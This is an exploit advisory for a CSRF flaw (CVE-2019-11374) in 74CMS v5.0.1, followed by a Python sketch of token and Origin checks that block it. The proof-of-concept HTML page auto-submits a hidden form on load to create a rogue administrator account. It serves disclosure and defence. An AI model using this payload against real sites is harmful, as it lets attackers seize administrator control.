# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user
# Date: 2019-04-14
# Exploit Author: ax8
# Vendor Homepage: https://github.com/Li-Siyuan
# Software Link: http://www.74cms.com/download/index.html
# Version: v5.0.1
# CVE : CVE-2019-11374

74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI.

<!-- poc.html (creates an administrator) -->
<!DOCTYPE html>
<html>
<head>
<title> CSRF Proof</title>
<script type="text/javascript">
function exec1(){
    document.getElementById('form1').submit();
}
</script>
</head>
<body onload="exec1();">
<form id="form1" action="http://localhost/index.php?m=Admin&c=admin&a=add" method="POST">
<input type="hidden" name="username" value="hacker1" />
<input type="hidden" name="email" value="111111111@qq.com" />
<input type="hidden" name="password" value="hacker1" />
<input type="hidden" name="repassword" value="hacker1" />
<input type="hidden" name="role_id" value="1" />
</form>
</body>
</html>
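The root cause is that the admin-add handler accepts any authenticated POST, so a form auto-submitted from a third-party page is indistinguishable from one submitted from the admin UI. The following is an added example (not 74CMS code; it models the handler in Python with a hypothetical Request/Session shape) showing the two checks that stop this class of request: a per-session synchronizer token compared in constant time, plus an Origin/Referer check against the assumed site origin http://localhost. The PoC above, replayed against this guard, is rejected with 403 while the same fields sent from the site with the session token are accepted.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "http://localhost"  # assumed origin of the 74CMS deployment
ADMIN_ADD = "/index.php?m=Admin&c=admin&a=add"


@dataclass
class Session:
    # One unguessable token per login session, rendered into the admin form.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:  # hypothetical request model, not the framework's own
    method: str
    path: str
    headers: dict
    form: dict
    session: Session


def same_origin(headers: dict) -> bool:
    """Browsers attach Origin (or at least Referer) to cross-site POSTs."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False  # no source header on a state change: treat as untrusted
    p = urlsplit(src)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def csrf_ok(req: Request) -> bool:
    submitted = req.form.get("csrf_token", "")
    # compare_digest avoids leaking the token through timing differences
    return hmac.compare_digest(submitted, req.session.csrf_token) and same_origin(req.headers)


def handle_admin_add(req: Request) -> tuple:
    """Guarded stand-in for m=Admin&c=admin&a=add; returns (status, message)."""
    if req.method != "POST" or req.path != ADMIN_ADD:
        return 405, "method not allowed"
    if not csrf_ok(req):
        return 403, "CSRF check failed"
    # normal validation of username/password/role_id would follow here
    return 200, f"admin {req.form['username']} created"


def demo() -> tuple:
    """Constructed requests: the PoC as a browser would send it, then a legitimate one."""
    sess = Session()
    fields = {"username": "hacker1", "email": "111111111@qq.com", "password": "hacker1",
              "repassword": "hacker1", "role_id": "1"}
    forged = Request("POST", ADMIN_ADD, {"Origin": "http://attacker.invalid"}, fields, sess)
    legit = Request("POST", ADMIN_ADD, {"Origin": SITE_ORIGIN},
                    {**fields, "csrf_token": sess.csrf_token}, sess)
    return handle_admin_add(forged)[0], handle_admin_add(legit)[0]
```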